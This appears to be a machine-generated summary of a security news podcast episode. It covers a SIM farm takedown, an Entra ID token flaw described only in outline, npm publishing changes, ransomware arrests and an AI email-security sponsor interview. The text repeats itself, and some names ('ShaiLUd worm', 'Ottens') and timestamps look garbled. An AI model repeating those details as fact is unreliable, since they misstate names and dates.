Risky Business #808 — "Insane megabug in Entra left all tenants exposed"

Date: September 24, 2025
Host: Patrick Gray
Guest Co-Host: Rob Joyce (former NSA, current security advisor)
Sponsor Interview: Josh Kamju, CEO & Co-Founder of Sublime Security

Episode Overview

This episode covers a dramatic array of recent infosec news, focusing on major developments in covert communications takedowns, critical vulnerabilities in Microsoft Entra ID (formerly Azure AD), post-disruption ransomware trends, and AI’s rapidly evolving role in security products. Host Patrick Gray is joined by former NSA senior official Rob Joyce for nuanced insight, while the latter part features a deep dive with Sublime Security’s Josh Kamju on pragmatic AI deployment in email threat detection.

Main News & Analysis

[00:08] Covert SIM Farm Takedown in New York

Key Details:

The US Secret Service dismantled a massive covert "SIM farm" operation spanning abandoned NYC apartments, featuring over 300 SIM servers and 100,000 SIM cards.
Used for encrypted messaging, possible DDoS attacks, and sending menacing messages to US government officials.
Suspected links to foreign governments, organized crime, drug cartels, and human trafficking.
Current forensic efforts are focused on tracing SIM card origins.

Insight:

Rob Joyce emphasized operational discipline failures and theorized this was a multipurpose infrastructure, possibly contracted for nation-state use but also "moonlighted" for other criminal purposes:

"Some people don't have the discipline they really need in nation state espionage...We may find this was like a contracted effort...and they used it, but they didn't know what was moonlighting on top of that network." — Rob Joyce [04:17]
The abundance of SIM cards is expected to be the operation’s undoing due to traceability.

"...those SIM cards are going to be the downfall of this operation because it's really hard to get SIM cards in large quantities...they'll be able to follow the money and follow the accounts..." — Rob Joyce [05:37]

[07:06] MI6 Rolls Out Tor Onion Service

Key Details:

The UK’s MI6 launched a Tor Onion service to facilitate confidential tips from potential collaborators.
MI6 openly acknowledged the risk of even viewing their YouTube instructions in repressive countries.

Analysis:

Patrick questions the wisdom of using Tor in high-surveillance environments.
Rob Joyce notes a history of problematic US attempts and parallels to CIA’s previous (flawed) tip ops, but says diversification of contact channels remains important:

"There's a lot of reasons that [this] is…challenging...But I think they're going to try a wide and diverse set of ways to allow that their sources to get in connection." — Rob Joyce [09:43]
Noted similarities between intelligence work and journalism in managing noisy “tip lines.”

"Every time I talk to someone from the intelligence community, there are so many aspects...that are so similar to journalism." — Patrick Gray [10:19]

[11:06] Microsoft Entra ID (Azure AD) Megabug

Key Details:

Security researcher Dirkjan Mollema discovered a critical flaw in Microsoft Entra ID's service tokens:
- Service tokens could be modified to change the tenant ID, allowing unauthorized access across any tenant.
- Attack bypassed logging/audit: Admin actions appeared as legitimate, masking compromise.
- Microsoft moved quickly to patch, assigned a CVE.

Impact:

Every Entra ID tenant (effectively, every Azure AD customer) was briefly vulnerable to total compromise ("God mode" per Rob Joyce).

Notable Quotes:

"This meant, yeah, full compromise of every single Entra ID tenant on the planet. This is like a 10 out of 10 megabug." — Patrick Gray [12:31]
"It certainly is a God mode token...Bypassed logging because it said an admin did this and the assumption was it was your admin in your tenant, not a phantom admin..." — Rob Joyce [12:54]

Evaluation:

Both acknowledge Microsoft has improved security post-CSRB review, but legacy architectures and technical debt remain a core risk.
Patrick:

"...they've sort of got this massive technical debt problem...it's kind of too late. Right?" [15:23]

[16:50] NPM/GitHub Supply Chain Security

Key Details:

Following the ShaiLUd worm, GitHub is moving toward FIDO-based MFA for npm package publication and new trusted publishing systems using short-lived OIDC tokens.
These steps are meant to curb key theft and publishing automation abuse.

Discussion:

Rob Joyce supports the changes:

"...multi factor hardware tokens aren't invulnerable either, but they raise the bar a lot for the attackers." [17:14]
Both agree attackers will still seek endpoints to compromise, but the changes shrink windows of opportunity.

[18:22] Major Ransomware Events and Scattered Spider Takedown

Key Incidents:

Ransomware disruptions at Collins Aerospace (Heathrow, Brussels, Dublin, Berlin flights delayed/canceled); Jaguar Land Rover and Marks & Spencer also targeted.
Law enforcement crackdown leads to arrests of "Scattered Spider" members—predominantly Western teenagers/young adults.
US DOJ indictments revealed ransom payments up to $115 million, including a massive bitcoin haul likely tied to ICBC, the world's largest bank.

Trends and Analysis:

Law enforcement pressure drove ransomware activity from hard-to-reach Eastern European actors to Western (UK/US) youth, who are more easily apprehended.
The group’s OPSEC failures, quirks, and indirect boasts hasten their downfall.
Rob Joyce:

"This is the snowball rolling downhill. Right. It just rolls right over people and scoops them into this big ball…as you get people to turn, they will turn on the associates…" [24:10]
Significant collateral damage from ransomware: e.g., JLR supply chain partner’s 55% stock loss, extended production pauses with real downstream impact:

"You talk on the knock on I, I read something that said, you know, Jaguar has 33,000 employees, but there's two supply chain. Ottens and, and others...the knock on effects are huge." — Rob Joyce [29:11]

[30:15] US Surveillance & Info Sharing Laws in Peril

Section 702 FISA reauthorization comes up again (expires April 2026). Both stress that a lapse would severely harm national defense and cyber operations:

"It would be a huge hit to a lot of the things we're talking about…it is an amazing tool..." — Rob Joyce [31:10]
The legal foundation for CISA-facilitated sharing also at risk, with potentially dire consequences for collaborative defense.
Rob Joyce:

"...I'm hoping we get the CISA renewal long before we're fighting over, you know, any of the section 702 renewals." [32:03]

Sponsor Interview: Josh Kamju, CEO of Sublime Security

[38:55–51:35]

Topic: Scalable, AI-Augmented Email Security — Where Does “Agentic” AI Actually Help?

Key Points

Scaling AI: You can’t send every inbound email through a large language model or full autonomous analysis. The compute cost is prohibitive, and most messages are benign.
Two-Layer Approach:
- Layer 1 (DSL/MQL): Lightweight, programmable query language for rapid, behavioral filtering based on environment-specific “suspicion” indicators.
- Layer 2 (AI/Agents): Only escalates flagged messages for in-depth agentic (AI/LLM) analysis and determines final actions.
Example Use Cases:
- An HTML attachment from a first-time sender with a new domain isn't always malicious, but sufficiently suspicious for further scrutiny.
- Layer 1 is responsible for “binning” obvious threats, Layer 2 for nuanced investigation.
Automation and Adaptivity:
Kamju stresses that no detection is perfect—adversaries constantly innovate—and their AI agents (ADE, ASA) are designed to close detection gaps much more quickly than retraining traditional models:

"No matter how good our detections or models are today, there will always be something that gets through...So the question is, what then? ...That's why we created ADE, to automate that whole process and bring the time to closing gaps…from weeks or months...to hours." — Josh Kamju [42:34]
Customization and Context:
Each installation of Sublime evolves its rules to match local context—“no two environments are the same.”

"There's a different lock on every house. You learn to pick one lock and you still, you don't know what's happening at the other house." — Josh Kamju [44:36]
Compute Costs:
SaaS customers’ compute costs for AI agents are absorbed by Sublime; on-prem customers pay their own. Efficient filtering and DSL logic keeps the cost manageable.
Agent Role:
LLM/AI agents are “tools users,” not “the tools” themselves—emphasizing structured, deterministic workflows powered by expressive filtering/analysis logic, not freeform LLM (“let the agent use the tools, not be the tool”).

"You want your agents to use the tools, not be the tools. Right?" — Patrick Gray [47:26]
Behavioral vs. IOC Detections:
ADE’s next evolution: automatically generate specific (stopgap) and general (behavioral) rules in parallel to adapt to both immediate threats and future attacker variations.

Notable Quotes

"This meant, yeah, full compromise of every single Entra ID tenant on the planet. This is like a 10 out of 10 megabug." — Patrick Gray [12:31]
"Some people don't have the discipline they really need in nation state espionage and nation state activities." — Rob Joyce [04:17]
"I do think our operating systems and our browsers and our cell phones are going to get much, much more protections through this [AI]. But there's so much legacy tech...It's like the forest fire that comes through and cleans. It gets rid of all...But, you know, if your house gets burned down, it's not great that the new one's going to be...shiny and new." — Rob Joyce [35:04]
"We suck at patching. So if you identify all these vulnerabilities, we're going to have a hard time of just locking the doors and windows." — Rob Joyce [36:41]
"There's a different lock on every house. You learn to pick one lock and you still, you don't know what's happening at the other house." — Josh Kamju [44:36]

Timestamps of Key Segments

Covert SIM farm bust — [01:08–06:39]
MI6 Tor Onion service — [07:06–10:19]
Microsoft Entra ID megabug — [11:06–15:23]
NPM supply chain security (GitHub/MFA) — [16:50–18:22]
Major ransomware (Collins Aerospace, JLR, Scattered Spider) — [18:22–29:44]
U.S. surveillance/info sharing statutes in jeopardy (702, CISA) — [30:15–33:57]
Sponsor interview: Pragmatic AI for email security (Josh Kamju/Sublime Security) — [38:55–51:35]

Wrap-Up

This episode encapsulates the turbulent intersection of cyberthreats, law enforcement, policy, and evolving technology. Standout moments include the jaw-dropping “God mode” bug in Microsoft Entra ID, high-impact ransomware hitting the physical world, and clear-eyed skepticism about AI’s security promise and peril.
If you want a grounded, expert-driven take on where security is breaking and how defenders are trying to keep up—with all the sharp, unscripted candor that makes Risky Business essential—this episode delivers it in spades.

Risky Business #808 — "Insane megabug in Entra left all tenants exposed"

Date: September 24, 2025
Host: Patrick Gray
Guest Co-Host: Rob Joyce (former NSA, current security advisor)
Sponsor Interview: Josh Kamju, CEO & Co-Founder of Sublime Security

Episode Overview

Main News & Analysis

[00:08] Covert SIM Farm Takedown in New York

Key Details:

The US Secret Service dismantled a massive covert "SIM farm" operation spanning abandoned NYC apartments, featuring over 300 SIM servers and 100,000 SIM cards.
Used for encrypted messaging, possible DDoS attacks, and sending menacing messages to US government officials.
Suspected links to foreign governments, organized crime, drug cartels, and human trafficking.
Current forensic efforts are focused on tracing SIM card origins.

Insight:

Rob Joyce emphasized operational discipline failures and theorized this was a multipurpose infrastructure, possibly contracted for nation-state use but also "moonlighted" for other criminal purposes:

"Some people don't have the discipline they really need in nation state espionage...We may find this was like a contracted effort...and they used it, but they didn't know what was moonlighting on top of that network." — Rob Joyce [04:17]
The abundance of SIM cards is expected to be the operation’s undoing due to traceability.

"...those SIM cards are going to be the downfall of this operation because it's really hard to get SIM cards in large quantities...they'll be able to follow the money and follow the accounts..." — Rob Joyce [05:37]

[07:06] MI6 Rolls Out Tor Onion Service

Key Details:

The UK’s MI6 launched a Tor Onion service to facilitate confidential tips from potential collaborators.
MI6 openly acknowledged the risk of even viewing their YouTube instructions in repressive countries.

Analysis:

Patrick questions the wisdom of using Tor in high-surveillance environments.
Rob Joyce notes a history of problematic US attempts and parallels to CIA’s previous (flawed) tip ops, but says diversification of contact channels remains important:

"There's a lot of reasons that [this] is…challenging...But I think they're going to try a wide and diverse set of ways to allow that their sources to get in connection." — Rob Joyce [09:43]
Noted similarities between intelligence work and journalism in managing noisy “tip lines.”

"Every time I talk to someone from the intelligence community, there are so many aspects...that are so similar to journalism." — Patrick Gray [10:19]

[11:06] Microsoft Entra ID (Azure AD) Megabug

Key Details:

Security researcher Dirkjan Mollema discovered a critical flaw in Microsoft Entra ID's service tokens:
- Service tokens could be modified to change the tenant ID, allowing unauthorized access across any tenant.
- Attack bypassed logging/audit: Admin actions appeared as legitimate, masking compromise.
- Microsoft moved quickly to patch, assigned a CVE.

Impact:

Every Entra ID tenant (effectively, every Azure AD customer) was briefly vulnerable to total compromise ("God mode" per Rob Joyce).

Notable Quotes:

"This meant, yeah, full compromise of every single Entra ID tenant on the planet. This is like a 10 out of 10 megabug." — Patrick Gray [12:31]
"It certainly is a God mode token...Bypassed logging because it said an admin did this and the assumption was it was your admin in your tenant, not a phantom admin..." — Rob Joyce [12:54]

Evaluation:

Both acknowledge Microsoft has improved security post-CSRB review, but legacy architectures and technical debt remain a core risk.
Patrick:

"...they've sort of got this massive technical debt problem...it's kind of too late. Right?" [15:23]

[16:50] NPM/GitHub Supply Chain Security

Key Details:

Following the ShaiLUd worm, GitHub is moving toward FIDO-based MFA for npm package publication and new trusted publishing systems using short-lived OIDC tokens.
These steps are meant to curb key theft and publishing automation abuse.

Discussion:

Rob Joyce supports the changes:

"...multi factor hardware tokens aren't invulnerable either, but they raise the bar a lot for the attackers." [17:14]
Both agree attackers will still seek endpoints to compromise, but the changes shrink windows of opportunity.

[18:22] Major Ransomware Events and Scattered Spider Takedown

Key Incidents:

Ransomware disruptions at Collins Aerospace (Heathrow, Brussels, Dublin, Berlin flights delayed/canceled); Jaguar Land Rover and Marks & Spencer also targeted.
Law enforcement crackdown leads to arrests of "Scattered Spider" members—predominantly Western teenagers/young adults.
US DOJ indictments revealed ransom payments up to $115 million, including a massive bitcoin haul likely tied to ICBC, the world's largest bank.

Trends and Analysis:

Law enforcement pressure drove ransomware activity from hard-to-reach Eastern European actors to Western (UK/US) youth, who are more easily apprehended.
The group’s OPSEC failures, quirks, and indirect boasts hasten their downfall.
Rob Joyce:

"This is the snowball rolling downhill. Right. It just rolls right over people and scoops them into this big ball…as you get people to turn, they will turn on the associates…" [24:10]
Significant collateral damage from ransomware: e.g., JLR supply chain partner’s 55% stock loss, extended production pauses with real downstream impact:

"You talk on the knock on I, I read something that said, you know, Jaguar has 33,000 employees, but there's two supply chain. Ottens and, and others...the knock on effects are huge." — Rob Joyce [29:11]

[30:15] US Surveillance & Info Sharing Laws in Peril

Section 702 FISA reauthorization comes up again (expires April 2026). Both stress that a lapse would severely harm national defense and cyber operations:

"It would be a huge hit to a lot of the things we're talking about…it is an amazing tool..." — Rob Joyce [31:10]
The legal foundation for CISA-facilitated sharing also at risk, with potentially dire consequences for collaborative defense.
Rob Joyce:

"...I'm hoping we get the CISA renewal long before we're fighting over, you know, any of the section 702 renewals." [32:03]

Sponsor Interview: Josh Kamju, CEO of Sublime Security

[38:55–51:35]

Topic: Scalable, AI-Augmented Email Security — Where Does “Agentic” AI Actually Help?

Key Points

Scaling AI: You can’t send every inbound email through a large language model or full autonomous analysis. The compute cost is prohibitive, and most messages are benign.
Two-Layer Approach:
- Layer 1 (DSL/MQL): Lightweight, programmable query language for rapid, behavioral filtering based on environment-specific “suspicion” indicators.
- Layer 2 (AI/Agents): Only escalates flagged messages for in-depth agentic (AI/LLM) analysis and determines final actions.
Example Use Cases:
- An HTML attachment from a first-time sender with a new domain isn't always malicious, but sufficiently suspicious for further scrutiny.
- Layer 1 is responsible for “binning” obvious threats, Layer 2 for nuanced investigation.
Automation and Adaptivity:
Kamju stresses that no detection is perfect—adversaries constantly innovate—and their AI agents (ADE, ASA) are designed to close detection gaps much more quickly than retraining traditional models:

"No matter how good our detections or models are today, there will always be something that gets through...So the question is, what then? ...That's why we created ADE, to automate that whole process and bring the time to closing gaps…from weeks or months...to hours." — Josh Kamju [42:34]
Customization and Context:
Each installation of Sublime evolves its rules to match local context—“no two environments are the same.”

"There's a different lock on every house. You learn to pick one lock and you still, you don't know what's happening at the other house." — Josh Kamju [44:36]
Compute Costs:
SaaS customers’ compute costs for AI agents are absorbed by Sublime; on-prem customers pay their own. Efficient filtering and DSL logic keeps the cost manageable.
Agent Role:
LLM/AI agents are “tools users,” not “the tools” themselves—emphasizing structured, deterministic workflows powered by expressive filtering/analysis logic, not freeform LLM (“let the agent use the tools, not be the tool”).

"You want your agents to use the tools, not be the tools. Right?" — Patrick Gray [47:26]
Behavioral vs. IOC Detections:
ADE’s next evolution: automatically generate specific (stopgap) and general (behavioral) rules in parallel to adapt to both immediate threats and future attacker variations.

Notable Quotes

"This meant, yeah, full compromise of every single Entra ID tenant on the planet. This is like a 10 out of 10 megabug." — Patrick Gray [12:31]
"Some people don't have the discipline they really need in nation state espionage and nation state activities." — Rob Joyce [04:17]
"I do think our operating systems and our browsers and our cell phones are going to get much, much more protections through this [AI]. But there's so much legacy tech...It's like the forest fire that comes through and cleans. It gets rid of all...But, you know, if your house gets burned down, it's not great that the new one's going to be...shiny and new." — Rob Joyce [35:04]
"We suck at patching. So if you identify all these vulnerabilities, we're going to have a hard time of just locking the doors and windows." — Rob Joyce [36:41]
"There's a different lock on every house. You learn to pick one lock and you still, you don't know what's happening at the other house." — Josh Kamju [44:36]

Timestamps of Key Segments

Covert SIM farm bust — [01:08–06:39]
MI6 Tor Onion service — [07:06–10:19]
Microsoft Entra ID megabug — [11:06–15:23]
NPM supply chain security (GitHub/MFA) — [16:50–18:22]
Major ransomware (Collins Aerospace, JLR, Scattered Spider) — [18:22–29:44]
U.S. surveillance/info sharing statutes in jeopardy (702, CISA) — [30:15–33:57]
Sponsor interview: Pragmatic AI for email security (Josh Kamju/Sublime Security) — [38:55–51:35]

wavePod

Risky Business #808 -- Insane megabug in Entra left all tenants exposed

Powered by Wave AI

Summary

Risky Business #808 — "Insane megabug in Entra left all tenants exposed"

Episode Overview

Main News & Analysis

[00:08] Covert SIM Farm Takedown in New York

[07:06] MI6 Rolls Out Tor Onion Service

[11:06] Microsoft Entra ID (Azure AD) Megabug

[16:50] NPM/GitHub Supply Chain Security

[18:22] Major Ransomware Events and Scattered Spider Takedown

[30:15] US Surveillance & Info Sharing Laws in Peril

Sponsor Interview: Josh Kamju, CEO of Sublime Security

Topic: Scalable, AI-Augmented Email Security — Where Does “Agentic” AI Actually Help?

Key Points

Notable Quotes

Timestamps of Key Segments

Wrap-Up

Summary

Risky Business #808 — "Insane megabug in Entra left all tenants exposed"

Episode Overview

Main News & Analysis

[00:08] Covert SIM Farm Takedown in New York

[07:06] MI6 Rolls Out Tor Onion Service

[11:06] Microsoft Entra ID (Azure AD) Megabug

[16:50] NPM/GitHub Supply Chain Security

[18:22] Major Ransomware Events and Scattered Spider Takedown

[30:15] US Surveillance & Info Sharing Laws in Peril

Sponsor Interview: Josh Kamju, CEO of Sublime Security

Topic: Scalable, AI-Augmented Email Security — Where Does “Agentic” AI Actually Help?

Key Points

Notable Quotes

Timestamps of Key Segments

Wrap-Up